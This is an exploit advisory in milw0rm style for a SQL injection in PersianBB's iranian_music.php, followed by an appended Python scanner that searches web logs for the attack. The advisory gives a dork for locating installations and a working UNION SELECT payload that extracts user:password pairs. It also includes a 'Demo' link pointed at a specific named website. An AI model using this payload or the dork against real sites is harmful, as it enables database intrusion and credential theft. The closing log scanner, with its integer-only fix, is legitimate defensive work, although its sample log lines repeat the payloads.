|___________________________________________________
|
| PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------- Hussin X ------------------
|
|    Author: Hussin X
|
|    Home  : WwW.IQ-ty.CoM
|
|    email : darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|
| script : http://www.persianbb.com/
|
| DorK   : Powered By : PersianBB.com
|___________________________________________________

Exploit:
________

www.[target].com/Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--

Demo:
________

http://persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--

________________( Greetz )_____________________

 _____   ____   __   __     _       ____
|_   _| |  _ \  \ \ / /    / \     / ___|
  | |   | |_) |  \ V /    / _ \   | |  _
  | |   |  _ <    | |    / ___ \  | |_| |
  |_|   |_| \_\   |_|   /_/   \_\  \____|

_______________________________________________

# milw0rm.com [2008-10-28]
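
A defender-side check for the injection shown above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to iranian_music.php whose id parameter is not a plain integer, and labels UNION SELECT attempts. The log lines, client addresses and function names are constructed for illustration, and a common/combined access-log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (illustration only, not from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2008:10:00:01 +0000] "GET /Script/iranian_music.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [28/Oct/2008:10:02:13 +0000] "GET /Script/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude-- HTTP/1.1" 200 4711',
    '192.0.2.78 - - [28/Oct/2008:10:02:40 +0000] "GET /Script/iranian_music.php?id=-1%20UNION/**/SELECT%201,2 HTTP/1.1" 200 4711',
    '192.0.2.79 - - [28/Oct/2008:10:03:05 +0000] "GET /Script/iranian_music.php?id=7%27 HTTP/1.1" 500 310',
    '192.0.2.11 - - [28/Oct/2008:10:04:00 +0000] "GET /Script/index.php?id=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_id(raw):
    """Return None for a plain integer id, otherwise a short reason string."""
    if re.fullmatch(r"\d{1,10}", raw):
        return None
    # Normalise before matching: inline SQL comments and repeated whitespace
    # are common ways to split keywords so naive string matching misses them.
    norm = re.sub(r"/\*.*?\*/", " ", raw.lower())
    norm = re.sub(r"\s+", " ", norm)
    if re.search(r"\bunion\b.*\bselect\b", norm):
        return "union-select"
    return "non-numeric-id"


def scan(lines, script="iranian_music.php"):
    """Return (line_no, client, reason) for each suspicious request to `script`."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qs URL-decodes values ('+' and %20 both become spaces).
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reason = classify_id(raw)
            if reason:
                findings.append((n, line.split()[0], reason))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule that classify_id applies is the server-side fix: reject any id that is not a plain integer and bind it as a query parameter instead of concatenating it into the SQL string.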